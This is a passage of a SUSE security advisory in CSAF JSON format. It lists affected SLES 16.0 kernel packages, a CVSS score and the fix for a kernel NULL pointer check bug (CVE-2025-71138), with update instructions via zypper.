"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
